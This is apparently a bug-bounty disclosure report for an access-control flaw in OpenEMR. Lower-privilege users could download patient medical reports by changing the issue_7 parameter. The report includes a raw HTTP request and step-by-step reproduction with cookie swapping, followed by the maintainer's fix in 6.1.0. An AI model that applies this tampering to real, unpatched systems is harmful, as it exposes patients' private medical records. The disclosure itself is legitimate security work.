Accounting User Can Download Patient Reports in openemr in openemr/openemr

Valid

Reported on

Mar 11th 2022


Vulnerability Type

Insecure Direct Object Reference

Affected URL

https://localhost/openemr/interface/patient_file/report/custom_report.php

Affected Parameters

“Issue_7”

Authentication Required?

Yes

Issue Summary

Non-privilege users (accounting & front-office) can download patient reports containing medical reports and documents by sending a request to a vulnerable end-point. There is no Access Control enforced, therefore, any authenticated user of OpenEMR can download patient records by just tampering the “Issue_7” parameter to any valid number. By incrementing this value, an unauthorized user can download patient records.

Recommendation

Implement ACL check to ensure that only authorized users of OpenEMR system are able to download patient documents from the vulnerable end-point.

Credits

Aden Yap Chuen Zhen (chuenzhen.yap2@baesystems.com) Rizan, Sheikh (rizan.sheikhmohdfauzi@baesystems.com) Ali Radzali
(muhammadali.radzali@baesystems.com)

Issue Reproduction

Login to OpenEMR as Admin and capture the POST request to the following end-point:

https://localhost/openemr/interface/patient_file/report/custom_report.php

In Burp, the HTTP POST request, cookie “OpenEMR” & parameter “issue_7” can be tampered.

Host: 192.168.0.141
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Origin: http://192.168.0.141
Connection: close
Referer: http://192.168.0.141/openemr/interface/patient_file/report/patient_report.php
Cookie: OpenEMR=E6toaL3R-180fA2-MIw80a-G7PJPCapZxrTYIzY%2Cofj5CXEG
 
Upgrade-Insecure-Requests: 1
 
include_demographics=demographics&include_billing=billing&pdf=1&issue_8=%2F&issue_10=%2F&issue_7=%2F14%2F&issue_6=%2F&issue_9=%2F&issue_11=%2F&issue_12=%2F

Replace the “OpenEMR” Cookie with Accountant Cookie and increment the “issue_7” parameter to any valid number eg “issue_7=/15/” to access patient documents.

We are processing your report and will contact the openemr team within 24 hours. 2 years ago
r00t.pgp modified the report
2 years ago
r00t.pgp modified the report
2 years ago
We have contacted a member of the openemr team and are waiting to hear back 2 years ago
We have sent a follow up to the openemr team. We will try again in 4 days. 2 years ago
openemr/openemr maintainer validated this vulnerability 2 years ago
r00tpgp has been awarded the disclosure bounty
The fix bounty is now up for grabs
openemr/openemr maintainer
2 years ago

Maintainer


This has been fixed in master and rel-610 branches and will be in OpenEMR's next production release (6.1.0).

openemr/openemr maintainer
2 years ago

Maintainer


OpenEMR 6.1.0 was released, today which fixes this issue.

openemr/openemr maintainer marked this as fixed in 6.1.0 with commit a2e918 2 years ago
The fix bounty has been dropped
r00t.pgp
2 years ago

Researcher


Hi, Kindly issue a CVE for this vulnerability. Tq

r00t.pgp
2 years ago

Researcher


Dear @admin i've already ping the maintainer, could you please follow up on the CVE creation? Tq

Dear @maintainer, could you kindly confirm that CVE can be created for this report? Tq

openemr/openemr maintainer
2 years ago

Maintainer


Hi, I consent to creation of CVE.

Jamie Slome
2 years ago

Sorted 👍

to join this conversation